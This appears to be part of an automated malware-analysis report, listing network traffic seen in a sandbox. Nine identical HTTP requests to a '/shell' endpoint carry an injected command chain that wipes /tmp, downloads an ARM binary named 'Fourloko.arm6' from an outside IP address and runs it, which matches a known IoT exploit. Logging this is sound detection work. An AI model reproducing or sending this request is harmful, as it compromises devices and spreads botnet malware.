        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: unknownHTTPS traffic detected: 162.213.33.132:443 -> 192.168.2.23:35426 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36624 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36626 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36628 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.213.33.108:443 -> 192.168.2.23:36630 version: TLS 1.2

        System Summary:

        bar